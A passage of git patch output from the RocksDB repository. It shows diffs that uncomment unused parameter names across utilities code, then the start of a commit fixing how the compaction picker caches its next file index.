WalFilter::WalProcessingOption BlobReconcileWalFilter::LogRecordFound( - unsigned long long /*log_number*/, const std::string& /*log_file_name*/, - const WriteBatch& /*batch*/, WriteBatch* /*new_batch*/, - bool* /*batch_changed*/) { + unsigned long long log_number, const std::string& log_file_name, + const WriteBatch& batch, WriteBatch* new_batch, bool* batch_changed) { return WalFilter::WalProcessingOption::kContinueProcessing; } @@ -159,7 +158,7 @@ bool blobf_compare_ttl::operator()(const std::shared_ptr& lhs, } void EvictAllVersionsCompactionListener::InternalListener::OnCompaction( - int /*level*/, const Slice& key, + int level, const Slice& key, CompactionEventListener::CompactionListenerValueType value_type, const Slice& existing_value, const SequenceNumber& sn, bool is_new) { if (!is_new && @@ -355,7 +354,7 @@ void BlobDBImpl::StartBackgroundTasks() { void BlobDBImpl::Shutdown() { shutdown_.store(true); } -void BlobDBImpl::OnFlushBeginHandler(DB* /*db*/, const FlushJobInfo& /*info*/) { +void BlobDBImpl::OnFlushBeginHandler(DB* db, const FlushJobInfo& info) { if (shutdown_.load()) return; // a callback that happens too soon needs to be ignored @@ -1396,7 +1395,7 @@ std::pair BlobDBImpl::SanityCheck(bool aborted) { } std::pair BlobDBImpl::CloseSeqWrite( - std::shared_ptr bfile, bool /*aborted*/) { + std::shared_ptr bfile, bool aborted) { { WriteLock wl(&mutex_); @@ -2052,7 +2051,7 @@ bool BlobDBImpl::CallbackEvictsImpl(std::shared_ptr bfile) { } std::pair BlobDBImpl::RemoveTimerQ(TimerQueue* tq, - bool /*aborted*/) { + bool aborted) { WriteLock wl(&mutex_); for (auto itr = cb_threads_.begin(); itr != cb_threads_.end(); ++itr) { if ((*itr).get() != tq) continue; diff --git a/utilities/blob_db/blob_log_reader.cc b/utilities/blob_db/blob_log_reader.cc index 09c329a0565..3931c8669b2 100644 --- a/utilities/blob_db/blob_log_reader.cc +++ b/utilities/blob_db/blob_log_reader.cc @@ -41,7 +41,7 @@ Status Reader::ReadHeader(BlobLogHeader* header) { } Status Reader::ReadRecord(BlobLogRecord* record, ReadLevel level, - WALRecoveryMode /*wal_recovery_mode*/) { + WALRecoveryMode wal_recovery_mode) { record->Clear(); buffer_.clear(); backing_store_[0] = '\0'; diff --git a/utilities/checkpoint/checkpoint_impl.cc b/utilities/checkpoint/checkpoint_impl.cc index c1cea914b16..0cdddbd628d 100644 --- a/utilities/checkpoint/checkpoint_impl.cc +++ b/utilities/checkpoint/checkpoint_impl.cc @@ -37,8 +37,8 @@ Status Checkpoint::Create(DB* db, Checkpoint** checkpoint_ptr) { return Status::OK(); } -Status Checkpoint::CreateCheckpoint(const std::string& /*checkpoint_dir*/, - uint64_t /*log_size_for_flush*/) { +Status Checkpoint::CreateCheckpoint(const std::string& checkpoint_dir, + uint64_t log_size_for_flush) { return Status::NotSupported(""); } diff --git a/utilities/checkpoint/checkpoint_test.cc b/utilities/checkpoint/checkpoint_test.cc index ef39541961e..56c8c6e0505 100644 --- a/utilities/checkpoint/checkpoint_test.cc +++ b/utilities/checkpoint/checkpoint_test.cc @@ -370,7 +370,7 @@ TEST_F(CheckpointTest, CheckpointCFNoFlush) { Status s; // Take a snapshot rocksdb::SyncPoint::GetInstance()->SetCallBack( - "DBImpl::BackgroundCallFlush:start", [&](void* /*arg*/) { + "DBImpl::BackgroundCallFlush:start", [&](void* arg) { // Flush should never trigger. FAIL(); }); diff --git a/utilities/col_buf_decoder.h b/utilities/col_buf_decoder.h index 918f87f9452..e795e4ecdfc 100644 --- a/utilities/col_buf_decoder.h +++ b/utilities/col_buf_decoder.h @@ -23,7 +23,7 @@ struct ColDeclaration; class ColBufDecoder { public: virtual ~ColBufDecoder() = 0; - virtual size_t Init(const char* /*src*/) { return 0; } + virtual size_t Init(const char* src) { return 0; } virtual size_t Decode(const char* src, char** dest) = 0; static ColBufDecoder* NewColBufDecoder(const ColDeclaration& col_declaration); diff --git a/utilities/compaction_filters/remove_emptyvalue_compactionfilter.cc b/utilities/compaction_filters/remove_emptyvalue_compactionfilter.cc index 49760ba5a97..43a25293456 100644 --- a/utilities/compaction_filters/remove_emptyvalue_compactionfilter.cc +++ b/utilities/compaction_filters/remove_emptyvalue_compactionfilter.cc @@ -16,11 +16,12 @@ const char* RemoveEmptyValueCompactionFilter::Name() const { return "RemoveEmptyValueCompactionFilter"; } -bool RemoveEmptyValueCompactionFilter::Filter(int /*level*/, - const Slice& /*key*/, - const Slice& existing_value, - std::string* /*new_value*/, - bool* /*value_changed*/) const { +bool RemoveEmptyValueCompactionFilter::Filter(int level, + const Slice& key, + const Slice& existing_value, + std::string* new_value, + bool* value_changed) const { + // remove kv pairs that have empty values return existing_value.empty(); } diff --git a/utilities/document/document_db.cc b/utilities/document/document_db.cc index ac36f0e7696..f7b5b3b2f3d 100644 --- a/utilities/document/document_db.cc +++ b/utilities/document/document_db.cc @@ -1038,25 +1038,24 @@ class DocumentDBImpl : public DocumentDB { // RocksDB functions using DB::Get; - virtual Status Get(const ReadOptions& /*options*/, - ColumnFamilyHandle* /*column_family*/, - const Slice& /*key*/, PinnableSlice* /*value*/) override { + virtual Status Get(const ReadOptions& options, + ColumnFamilyHandle* column_family, const Slice& key, + PinnableSlice* value) override { return Status::NotSupported(""); } - virtual Status Get(const ReadOptions& /*options*/, const Slice& /*key*/, - std::string* /*value*/) override { + virtual Status Get(const ReadOptions& options, const Slice& key, + std::string* value) override { return Status::NotSupported(""); } - virtual Status Write(const WriteOptions& /*options*/, - WriteBatch* /*updates*/) override { + virtual Status Write(const WriteOptions& options, + WriteBatch* updates) override { return Status::NotSupported(""); } - virtual Iterator* NewIterator( - const ReadOptions& /*options*/, - ColumnFamilyHandle* /*column_family*/) override { + virtual Iterator* NewIterator(const ReadOptions& options, + ColumnFamilyHandle* column_family) override { return nullptr; } - virtual Iterator* NewIterator(const ReadOptions& /*options*/) override { + virtual Iterator* NewIterator(const ReadOptions& options) override { return nullptr; } diff --git a/utilities/merge_operators/max.cc b/utilities/merge_operators/max.cc index ff7b2a75a34..06e233fe89d 100644 --- a/utilities/merge_operators/max.cc +++ b/utilities/merge_operators/max.cc @@ -36,9 +36,9 @@ class MaxOperator : public MergeOperator { return true; } - virtual bool PartialMerge(const Slice& /*key*/, const Slice& left_operand, + virtual bool PartialMerge(const Slice& key, const Slice& left_operand, const Slice& right_operand, std::string* new_value, - Logger* /*logger*/) const override { + Logger* logger) const override { if (left_operand.compare(right_operand) >= 0) { new_value->assign(left_operand.data(), left_operand.size()); } else { @@ -47,10 +47,10 @@ class MaxOperator : public MergeOperator { return true; } - virtual bool PartialMergeMulti(const Slice& /*key*/, + virtual bool PartialMergeMulti(const Slice& key, const std::deque& operand_list, std::string* new_value, - Logger* /*logger*/) const override { + Logger* logger) const override { Slice max; for (const auto& operand : operand_list) { if (max.compare(operand) < 0) { diff --git a/utilities/merge_operators/put.cc b/utilities/merge_operators/put.cc index fcbf67d9b03..7f206ad3b09 100644 --- a/utilities/merge_operators/put.cc +++ b/utilities/merge_operators/put.cc @@ -22,10 +22,11 @@ namespace { // anonymous namespace // From the client-perspective, semantics are the same. class PutOperator : public MergeOperator { public: - virtual bool FullMerge(const Slice& /*key*/, const Slice* /*existing_value*/, + virtual bool FullMerge(const Slice& key, + const Slice* existing_value, const std::deque& operand_sequence, std::string* new_value, - Logger* /*logger*/) const override { + Logger* logger) const override { // Put basically only looks at the current/latest value assert(!operand_sequence.empty()); assert(new_value != nullptr); @@ -33,18 +34,20 @@ class PutOperator : public MergeOperator { return true; } - virtual bool PartialMerge(const Slice& /*key*/, const Slice& /*left_operand*/, - const Slice& right_operand, std::string* new_value, - Logger* /*logger*/) const override { + virtual bool PartialMerge(const Slice& key, + const Slice& left_operand, + const Slice& right_operand, + std::string* new_value, + Logger* logger) const override { new_value->assign(right_operand.data(), right_operand.size()); return true; } using MergeOperator::PartialMergeMulti; - virtual bool PartialMergeMulti(const Slice& /*key*/, + virtual bool PartialMergeMulti(const Slice& key, const std::deque& operand_list, - std::string* new_value, - Logger* /*logger*/) const override { + std::string* new_value, Logger* logger) const + override { new_value->assign(operand_list.back().data(), operand_list.back().size()); return true; } @@ -55,10 +58,10 @@ class PutOperator : public MergeOperator { }; class PutOperatorV2 : public PutOperator { - virtual bool FullMerge(const Slice& /*key*/, const Slice* /*existing_value*/, - const std::deque& /*operand_sequence*/, - std::string* /*new_value*/, - Logger* /*logger*/) const override { + virtual bool FullMerge(const Slice& key, const Slice* existing_value, + const std::deque& operand_sequence, + std::string* new_value, + Logger* logger) const override { assert(false); return false; } diff --git a/utilities/merge_operators/string_append/stringappend.cc b/utilities/merge_operators/string_append/stringappend.cc index e3e755dfd8c..ff19348f07b 100644 --- a/utilities/merge_operators/string_append/stringappend.cc +++ b/utilities/merge_operators/string_append/stringappend.cc @@ -21,10 +21,12 @@ StringAppendOperator::StringAppendOperator(char delim_char) } // Implementation for the merge operation (concatenates two strings) -bool StringAppendOperator::Merge(const Slice& /*key*/, +bool StringAppendOperator::Merge(const Slice& key, const Slice* existing_value, - const Slice& value, std::string* new_value, - Logger* /*logger*/) const { + const Slice& value, + std::string* new_value, + Logger* logger) const { + // Clear the *new_value for writing. assert(new_value); new_value->clear(); diff --git a/utilities/merge_operators/string_append/stringappend2.cc b/utilities/merge_operators/string_append/stringappend2.cc index 6e46d80a139..2d7b7423ce8 100644 --- a/utilities/merge_operators/string_append/stringappend2.cc +++ b/utilities/merge_operators/string_append/stringappend2.cc @@ -68,16 +68,16 @@ bool StringAppendTESTOperator::FullMergeV2( } bool StringAppendTESTOperator::PartialMergeMulti( - const Slice& /*key*/, const std::deque& /*operand_list*/, - std::string* /*new_value*/, Logger* /*logger*/) const { + const Slice& key, const std::deque& operand_list, + std::string* new_value, Logger* logger) const { return false; } // A version of PartialMerge that actually performs "partial merging". // Use this to simulate the exact behaviour of the StringAppendOperator. bool StringAppendTESTOperator::_AssocPartialMergeMulti( - const Slice& /*key*/, const std::deque& operand_list, - std::string* new_value, Logger* /*logger*/) const { + const Slice& key, const std::deque& operand_list, + std::string* new_value, Logger* logger) const { // Clear the *new_value for writing assert(new_value); new_value->clear(); diff --git a/utilities/merge_operators/uint64add.cc b/utilities/merge_operators/uint64add.cc index dc761e74b20..d7821737517 100644 --- a/utilities/merge_operators/uint64add.cc +++ b/utilities/merge_operators/uint64add.cc @@ -20,8 +20,10 @@ namespace { // anonymous namespace // Implemented as an AssociativeMergeOperator for simplicity and example. class UInt64AddOperator : public AssociativeMergeOperator { public: - virtual bool Merge(const Slice& /*key*/, const Slice* existing_value, - const Slice& value, std::string* new_value, + virtual bool Merge(const Slice& key, + const Slice* existing_value, + const Slice& value, + std::string* new_value, Logger* logger) const override { uint64_t orig_value = 0; if (existing_value){ diff --git a/utilities/object_registry_test.cc b/utilities/object_registry_test.cc index fe69d9a3959..40fb387bc93 100644 --- a/utilities/object_registry_test.cc +++ b/utilities/object_registry_test.cc @@ -18,14 +18,13 @@ class EnvRegistryTest : public testing::Test { int EnvRegistryTest::num_a = 0; int EnvRegistryTest::num_b = 0; -static Registrar test_reg_a("a://.*", - [](const std::string& /*uri*/, - std::unique_ptr* /*env_guard*/) { - ++EnvRegistryTest::num_a; - return Env::Default(); - }); +static Registrar test_reg_a("a://.*", [](const std::string& uri, + std::unique_ptr* env_guard) { + ++EnvRegistryTest::num_a; + return Env::Default(); +}); -static Registrar test_reg_b("b://.*", [](const std::string& /*uri*/, +static Registrar test_reg_b("b://.*", [](const std::string& uri, std::unique_ptr* env_guard) { ++EnvRegistryTest::num_b; // Env::Default() is a singleton so we can't grant ownership directly to the diff --git a/utilities/options/options_util_test.cc b/utilities/options/options_util_test.cc index 39fbec52b47..86b382cfab5 100644 --- a/utilities/options/options_util_test.cc +++ b/utilities/options/options_util_test.cc @@ -102,22 +102,22 @@ class DummyTableFactory : public TableFactory { virtual const char* Name() const { return "DummyTableFactory"; } - virtual Status NewTableReader( - const TableReaderOptions& /*table_reader_options*/, - unique_ptr&& /*file*/, uint64_t /*file_size*/, - unique_ptr* /*table_reader*/, - bool /*prefetch_index_and_filter_in_cache*/) const { + virtual Status NewTableReader(const TableReaderOptions& table_reader_options, + unique_ptr&& file, + uint64_t file_size, + unique_ptr* table_reader, + bool prefetch_index_and_filter_in_cache) const { return Status::NotSupported(); } virtual TableBuilder* NewTableBuilder( - const TableBuilderOptions& /*table_builder_options*/, - uint32_t /*column_family_id*/, WritableFileWriter* /*file*/) const { + const TableBuilderOptions& table_builder_options, + uint32_t column_family_id, WritableFileWriter* file) const { return nullptr; } - virtual Status SanitizeOptions(const DBOptions& /*db_opts*/, - const ColumnFamilyOptions& /*cf_opts*/) const { + virtual Status SanitizeOptions(const DBOptions& db_opts, + const ColumnFamilyOptions& cf_opts) const { return Status::NotSupported(); } @@ -129,15 +129,15 @@ class DummyMergeOperator : public MergeOperator { DummyMergeOperator() {} virtual ~DummyMergeOperator() {} - virtual bool FullMergeV2(const MergeOperationInput& /*merge_in*/, - MergeOperationOutput* /*merge_out*/) const override { + virtual bool FullMergeV2(const MergeOperationInput& merge_in, + MergeOperationOutput* merge_out) const override { return false; } - virtual bool PartialMergeMulti(const Slice& /*key*/, - const std::deque& /*operand_list*/, - std::string* /*new_value*/, - Logger* /*logger*/) const override { + virtual bool PartialMergeMulti(const Slice& key, + const std::deque& operand_list, + std::string* new_value, + Logger* logger) const override { return false; } @@ -156,10 +156,10 @@ class DummySliceTransform : public SliceTransform { virtual Slice Transform(const Slice& src) const { return src; } // determine whether this is a valid src upon the function applies - virtual bool InDomain(const Slice& /*src*/) const { return false; } + virtual bool InDomain(const Slice& src) const { return false; } // determine whether dst=Transform(src) for some src - virtual bool InRange(const Slice& /*dst*/) const { return false; } + virtual bool InRange(const Slice& dst) const { return false; } }; } // namespace diff --git a/utilities/persistent_cache/block_cache_tier_file.cc b/utilities/persistent_cache/block_cache_tier_file.cc index fac8d75e29a..85e0610b7e4 100644 --- a/utilities/persistent_cache/block_cache_tier_file.cc +++ b/utilities/persistent_cache/block_cache_tier_file.cc @@ -277,7 +277,7 @@ WriteableCacheFile::~WriteableCacheFile() { ClearBuffers(); } -bool WriteableCacheFile::Create(const bool /*enable_direct_writes*/, +bool WriteableCacheFile::Create(const bool enable_direct_writes, const bool enable_direct_reads) { WriteLock _(&rwlock_); diff --git a/utilities/persistent_cache/block_cache_tier_file.h b/utilities/persistent_cache/block_cache_tier_file.h index ef5dbab0408..3922136d67e 100644 --- a/utilities/persistent_cache/block_cache_tier_file.h +++ b/utilities/persistent_cache/block_cache_tier_file.h @@ -103,15 +103,13 @@ class BlockCacheFile : public LRUElement { virtual ~BlockCacheFile() {} // append key/value to file and return LBA locator to user - virtual bool Append(const Slice& /*key*/, const Slice& /*val*/, - LBA* const /*lba*/) { + virtual bool Append(const Slice& key, const Slice& val, LBA* const lba) { assert(!"not implemented"); return false; } // read from the record locator (LBA) and return key, value and status - virtual bool Read(const LBA& /*lba*/, Slice* /*key*/, Slice* /*block*/, - char* /*scratch*/) { + virtual bool Read(const LBA& lba, Slice* key, Slice* block, char* scratch) { assert(!"not implemented"); return false; } diff --git a/utilities/persistent_cache/hash_table_test.cc b/utilities/persistent_cache/hash_table_test.cc index 6fe5a596545..1a6df4e6144 100644 --- a/utilities/persistent_cache/hash_table_test.cc +++ b/utilities/persistent_cache/hash_table_test.cc @@ -43,7 +43,7 @@ struct HashTableTest : public testing::Test { } }; - static void ClearNode(Node /*node*/) {} + static void ClearNode(Node node) {} HashTable map_; }; @@ -73,7 +73,7 @@ struct EvictableHashTableTest : public testing::Test { } }; - static void ClearNode(Node* /*node*/) {} + static void ClearNode(Node* node) {} EvictableHashTable map_; }; diff --git a/utilities/persistent_cache/persistent_cache_test.h b/utilities/persistent_cache/persistent_cache_test.h index 37e842f2e2a..77fd172ba08 100644 --- a/utilities/persistent_cache/persistent_cache_test.h +++ b/utilities/persistent_cache/persistent_cache_test.h @@ -233,8 +233,8 @@ class PersistentCacheDBTest : public DBTestBase { // insert data to table void Insert(const Options& options, - const BlockBasedTableOptions& /*table_options*/, - const int num_iter, std::vector* values) { + const BlockBasedTableOptions& table_options, const int num_iter, + std::vector* values) { CreateAndReopenWithCF({"pikachu"}, options); // default column family doesn't have block cache Options no_block_cache_opts; diff --git a/utilities/persistent_cache/persistent_cache_tier.cc b/utilities/persistent_cache/persistent_cache_tier.cc index 732762a1652..0f500e87127 100644 --- a/utilities/persistent_cache/persistent_cache_tier.cc +++ b/utilities/persistent_cache/persistent_cache_tier.cc @@ -75,12 +75,12 @@ Status PersistentCacheTier::Close() { return Status::OK(); } -bool PersistentCacheTier::Reserve(const size_t /*size*/) { +bool PersistentCacheTier::Reserve(const size_t size) { // default implementation is a pass through return true; } -bool PersistentCacheTier::Erase(const Slice& /*key*/) { +bool PersistentCacheTier::Erase(const Slice& key) { // default implementation is a pass through since not all cache tiers might // support erase return true; diff --git a/utilities/persistent_cache/volatile_tier_impl.cc b/utilities/persistent_cache/volatile_tier_impl.cc index 177fc916904..d190a210282 100644 --- a/utilities/persistent_cache/volatile_tier_impl.cc +++ b/utilities/persistent_cache/volatile_tier_impl.cc @@ -106,7 +106,7 @@ Status VolatileCacheTier::Lookup(const Slice& page_key, return Status::NotFound("key not found in volatile cache"); } -bool VolatileCacheTier::Erase(const Slice& /*key*/) { +bool VolatileCacheTier::Erase(const Slice& key) { assert(!"not supported"); return true; } diff --git a/utilities/redis/redis_list_iterator.h b/utilities/redis/redis_list_iterator.h index 1c4bc11e590..73907ddf8c4 100644 --- a/utilities/redis/redis_list_iterator.h +++ b/utilities/redis/redis_list_iterator.h @@ -288,7 +288,7 @@ class RedisListIterator { /// Will throw an exception based on the passed-in message. /// This function is guaranteed to STOP THE CONTROL-FLOW. /// (i.e.: you do not have to call "return" after calling ThrowError) - void ThrowError(const char* const /*msg*/ = NULL) { + void ThrowError(const char* const msg = NULL) { // TODO: For now we ignore the msg parameter. This can be expanded later. throw RedisListException(); } diff --git a/utilities/simulator_cache/sim_cache.cc b/utilities/simulator_cache/sim_cache.cc index 6c0adf6a740..335ac9896d0 100644 --- a/utilities/simulator_cache/sim_cache.cc +++ b/utilities/simulator_cache/sim_cache.cc @@ -43,7 +43,7 @@ class SimCacheImpl : public SimCache { Handle* h = key_only_cache_->Lookup(key); if (h == nullptr) { key_only_cache_->Insert(key, nullptr, charge, - [](const Slice& /*k*/, void* /*v*/) {}, nullptr, + [](const Slice& k, void* v) {}, nullptr, priority); } else { key_only_cache_->Release(h); diff --git a/utilities/simulator_cache/sim_cache_test.cc b/utilities/simulator_cache/sim_cache_test.cc index d01cdd5304d..01b328c783e 100644 --- a/utilities/simulator_cache/sim_cache_test.cc +++ b/utilities/simulator_cache/sim_cache_test.cc @@ -39,7 +39,7 @@ class SimCacheTest : public DBTestBase { return options; } - void InitTable(const Options& /*options*/) { + void InitTable(const Options& options) { std::string value(kValueSize, 'a'); for (size_t i = 0; i < kNumBlocks * 2; i++) { ASSERT_OK(Put(ToString(i), value.c_str())); diff --git a/utilities/spatialdb/spatial_db.cc b/utilities/spatialdb/spatial_db.cc index a9b990ee20f..539ddd06ee0 100644 --- a/utilities/spatialdb/spatial_db.cc +++ b/utilities/spatialdb/spatial_db.cc @@ -704,7 +704,7 @@ DBOptions GetDBOptionsFromSpatialDBOptions(const SpatialDBOptions& options) { return db_options; } -ColumnFamilyOptions GetColumnFamilyOptions(const SpatialDBOptions& /*options*/, +ColumnFamilyOptions GetColumnFamilyOptions(const SpatialDBOptions& options, std::shared_ptr block_cache) { ColumnFamilyOptions column_family_options; column_family_options.write_buffer_size = 128 * 1024 * 1024; // 128MB diff --git a/utilities/table_properties_collectors/compact_on_deletion_collector.cc b/utilities/table_properties_collectors/compact_on_deletion_collector.cc index 625318609d9..304cdfff889 100644 --- a/utilities/table_properties_collectors/compact_on_deletion_collector.cc +++ b/utilities/table_properties_collectors/compact_on_deletion_collector.cc @@ -39,11 +39,10 @@ void CompactOnDeletionCollector::Reset() { // @params key the user key that is inserted into the table. // @params value the value that is inserted into the table. // @params file_size file size up to now -Status CompactOnDeletionCollector::AddUserKey(const Slice& /*key*/, - const Slice& /*value*/, - EntryType type, - SequenceNumber /*seq*/, - uint64_t /*file_size*/) { +Status CompactOnDeletionCollector::AddUserKey( + const Slice& key, const Slice& value, + EntryType type, SequenceNumber seq, + uint64_t file_size) { if (need_compaction_) { // If the output file already needs to be compacted, skip the check. return Status::OK(); @@ -78,7 +77,7 @@ Status CompactOnDeletionCollector::AddUserKey(const Slice& /*key*/, TablePropertiesCollector* CompactOnDeletionCollectorFactory::CreateTablePropertiesCollector( - TablePropertiesCollectorFactory::Context /*context*/) { + TablePropertiesCollectorFactory::Context context) { return new CompactOnDeletionCollector( sliding_window_size_, deletion_trigger_); } diff --git a/utilities/table_properties_collectors/compact_on_deletion_collector.h b/utilities/table_properties_collectors/compact_on_deletion_collector.h index 34cd633659b..bd240e5170d 100644 --- a/utilities/table_properties_collectors/compact_on_deletion_collector.h +++ b/utilities/table_properties_collectors/compact_on_deletion_collector.h @@ -60,7 +60,7 @@ class CompactOnDeletionCollector : public TablePropertiesCollector { // for writing the properties block. // @params properties User will add their collected statistics to // `properties`. - virtual Status Finish(UserCollectedProperties* /*properties*/) override { + virtual Status Finish(UserCollectedProperties* properties) override { Reset(); return Status::OK(); } diff --git a/utilities/table_properties_collectors/compact_on_deletion_collector_test.cc b/utilities/table_properties_collectors/compact_on_deletion_collector_test.cc index eabc2271c48..3c946bf414f 100644 --- a/utilities/table_properties_collectors/compact_on_deletion_collector_test.cc +++ b/utilities/table_properties_collectors/compact_on_deletion_collector_test.cc @@ -20,7 +20,7 @@ #include "util/random.h" #include "utilities/table_properties_collectors/compact_on_deletion_collector.h" -int main(int /*argc*/, char** /*argv*/) { +int main(int argc, char** argv) { const int kWindowSizes[] = {1000, 10000, 10000, 127, 128, 129, 255, 256, 257, 2, 10000}; const int kDeletionTriggers[] = diff --git a/utilities/transactions/optimistic_transaction_impl.cc b/utilities/transactions/optimistic_transaction_impl.cc index bae0d609f29..5652189bc35 100644 --- a/utilities/transactions/optimistic_transaction_impl.cc +++ b/utilities/transactions/optimistic_transaction_impl.cc @@ -133,7 +133,7 @@ Status OptimisticTransactionImpl::CheckTransactionForConflicts(DB* db) { true /* cache_only */); } -Status OptimisticTransactionImpl::SetName(const TransactionName& /*name*/) { +Status OptimisticTransactionImpl::SetName(const TransactionName& name) { return Status::InvalidArgument("Optimistic transactions cannot be named."); } diff --git a/utilities/transactions/optimistic_transaction_impl.h b/utilities/transactions/optimistic_transaction_impl.h index 3618c69326e..6baec6962ec 100644 --- a/utilities/transactions/optimistic_transaction_impl.h +++ b/utilities/transactions/optimistic_transaction_impl.h @@ -67,8 +67,8 @@ class OptimisticTransactionImpl : public TransactionBaseImpl { void Clear() override; - void UnlockGetForUpdate(ColumnFamilyHandle* /*column_family*/, - const Slice& /*key*/) override { + void UnlockGetForUpdate(ColumnFamilyHandle* column_family, + const Slice& key) override { // Nothing to unlock. } diff --git a/utilities/transactions/transaction_base.h b/utilities/transactions/transaction_base.h index 105da0ab9e2..1514836489e 100644 --- a/utilities/transactions/transaction_base.h +++ b/utilities/transactions/transaction_base.h @@ -165,7 +165,7 @@ class TransactionBaseImpl : public Transaction { WriteBatchWithIndex* GetWriteBatch() override; - virtual void SetLockTimeout(int64_t /*timeout*/) override { /* Do nothing */ + virtual void SetLockTimeout(int64_t timeout) override { /* Do nothing */ } const Snapshot* GetSnapshot() const override { diff --git a/utilities/transactions/transaction_impl.cc b/utilities/transactions/transaction_impl.cc index 2e3d69633bf..408b15bcd3d 100644 --- a/utilities/transactions/transaction_impl.cc +++ b/utilities/transactions/transaction_impl.cc @@ -367,12 +367,12 @@ Status TransactionImpl::LockBatch(WriteBatch* batch, } virtual Status PutCF(uint32_t column_family_id, const Slice& key, - const Slice& /*value*/) override { + const Slice& value) override { RecordKey(column_family_id, key); return Status::OK(); } virtual Status MergeCF(uint32_t column_family_id, const Slice& key, - const Slice& /*value*/) override { + const Slice& value) override { RecordKey(column_family_id, key); return Status::OK(); } diff --git a/utilities/transactions/transaction_impl.h b/utilities/transactions/transaction_impl.h index 79db430e759..01f8f4b2a2d 100644 --- a/utilities/transactions/transaction_impl.h +++ b/utilities/transactions/transaction_impl.h @@ -180,7 +180,7 @@ class TransactionCallback : public WriteCallback { public: explicit TransactionCallback(TransactionImpl* txn) : txn_(txn) {} - Status Callback(DB* /*db*/) override { + Status Callback(DB* db) override { if (txn_->IsExpired()) { return Status::Expired(); } else { diff --git a/utilities/transactions/transaction_test.cc b/utilities/transactions/transaction_test.cc index 7b2f8a3c768..ce01388f8a8 100644 --- a/utilities/transactions/transaction_test.cc +++ b/utilities/transactions/transaction_test.cc @@ -211,7 +211,7 @@ TEST_P(TransactionTest, WaitingTxn) { ASSERT_TRUE(txn2); rocksdb::SyncPoint::GetInstance()->SetCallBack( - "TransactionLockMgr::AcquireWithTimeout:WaitingTxn", [&](void* /*arg*/) { + "TransactionLockMgr::AcquireWithTimeout:WaitingTxn", [&](void* arg) { std::string key; uint32_t cf_id; std::vector wait = txn2->GetWaitingTxns(&cf_id, &key); @@ -433,7 +433,7 @@ TEST_P(TransactionTest, DeadlockCycleShared) { std::atomic checkpoints(0); rocksdb::SyncPoint::GetInstance()->SetCallBack( "TransactionLockMgr::AcquireWithTimeout:WaitingTxn", - [&](void* /*arg*/) { checkpoints.fetch_add(1); }); + [&](void* arg) { checkpoints.fetch_add(1); }); rocksdb::SyncPoint::GetInstance()->EnableProcessing(); // We want the leaf transactions to block and hold everyone back. @@ -501,7 +501,7 @@ TEST_P(TransactionTest, DeadlockCycle) { std::atomic checkpoints(0); rocksdb::SyncPoint::GetInstance()->SetCallBack( "TransactionLockMgr::AcquireWithTimeout:WaitingTxn", - [&](void* /*arg*/) { checkpoints.fetch_add(1); }); + [&](void* arg) { checkpoints.fetch_add(1); }); rocksdb::SyncPoint::GetInstance()->EnableProcessing(); // We want the last transaction in the chain to block and hold everyone @@ -4423,7 +4423,7 @@ TEST_P(TransactionTest, ExpiredTransactionDataRace1) { rocksdb::SyncPoint::GetInstance()->LoadDependency( {{"TransactionTest::ExpirableTransactionDataRace:1"}}); rocksdb::SyncPoint::GetInstance()->SetCallBack( - "TransactionTest::ExpirableTransactionDataRace:1", [&](void* /*arg*/) { + "TransactionTest::ExpirableTransactionDataRace:1", [&](void* arg) { WriteOptions write_options; TransactionOptions txn_options; diff --git a/utilities/ttl/ttl_test.cc b/utilities/ttl/ttl_test.cc index 7aa411b6183..586d0ce1f6c 100644 --- a/utilities/ttl/ttl_test.cc +++ b/utilities/ttl/ttl_test.cc @@ -295,8 +295,8 @@ class TtlTest : public testing::Test { // Keeps key if it is in [kSampleSize_/3, 2*kSampleSize_/3), // Change value if it is in [2*kSampleSize_/3, kSampleSize_) // Eg. kSampleSize_=6. Drop:key0-1...Keep:key2-3...Change:key4-5... - virtual bool Filter(int /*level*/, const Slice& key, const Slice& /*value*/, - std::string* new_value, + virtual bool Filter(int level, const Slice& key, + const Slice& value, std::string* new_value, bool* value_changed) const override { assert(new_value != nullptr); @@ -345,7 +345,7 @@ class TtlTest : public testing::Test { } virtual std::unique_ptr CreateCompactionFilter( - const CompactionFilter::Context& /*context*/) override { + const CompactionFilter::Context& context) override { return std::unique_ptr( new TestFilter(kSampleSize_, kNewValue_)); } diff --git a/utilities/write_batch_with_index/write_batch_with_index_test.cc b/utilities/write_batch_with_index/write_batch_with_index_test.cc index 105f7517d29..5b1250a6431 100644 --- a/utilities/write_batch_with_index/write_batch_with_index_test.cc +++ b/utilities/write_batch_with_index/write_batch_with_index_test.cc @@ -63,7 +63,7 @@ struct TestHandler : public WriteBatch::Handler { seen[column_family_id].push_back(e); return Status::OK(); } - virtual void LogData(const Slice& /*blob*/) {} + virtual void LogData(const Slice& blob) {} virtual Status DeleteCF(uint32_t column_family_id, const Slice& key) { Entry e; e.key = key.ToString(); From a34b2e388ee51173e44f6aa290f1301c33af9e67 Mon Sep 17 00:00:00 2001 From: Andrew Kryczka Date: Fri, 21 Jul 2017 20:56:32 -0700 Subject: [PATCH 027/205] Fix caching of compaction picker's next index Summary: The previous implementation of caching `file_size` index made no sense. It only remembered the original span of locked files starting from beginning of `file_size`. We should remember the index after all compactions that have been considered but rejected. This will reduce the work we do while holding the db mutex. Closes https://github.com/facebook/rocksdb/pull/2624 Differential Revision: D5468152 Pulled By: ajkr fbshipit-source-id: ab92a4bffe76f9f174d861bb5812b974d1013400 --- db/compaction_picker.cc | 17 +++++--------- db/compaction_picker_test.cc | 43 ++++++++++++++++++++++++++++++++++++ 2 files changed, 48 insertions(+), 12 deletions(-) diff --git a/db/compaction_picker.cc b/db/compaction_picker.cc index 6ee4ebd1f16..c6a56746ff0 100644 --- a/db/compaction_picker.cc +++ b/db/compaction_picker.cc @@ -1323,12 +1323,10 @@ bool LevelCompactionBuilder::PickFileToCompact() { const std::vector& level_files = vstorage_->LevelFiles(start_level_); - // record the first file that is not yet compacted - int nextIndex = -1; - - for (unsigned int i = vstorage_->NextCompactionIndex(start_level_); - i < file_size.size(); i++) { - int index = file_size[i]; + unsigned int cmp_idx; + for (cmp_idx = vstorage_->NextCompactionIndex(start_level_); + cmp_idx < file_size.size(); cmp_idx++) { + int index = file_size[cmp_idx]; auto* f = level_files[index]; // do not pick a file to compact if it is being compacted @@ -1337,11 +1335,6 @@ bool LevelCompactionBuilder::PickFileToCompact() { continue; } - // remember the startIndex for the next call to PickCompaction - if (nextIndex == -1) { - nextIndex = i; - } - start_level_inputs_.files.push_back(f); start_level_inputs_.level = start_level_; if (!compaction_picker_->ExpandInputsToCleanCut(cf_name_, vstorage_, @@ -1377,7 +1370,7 @@ bool 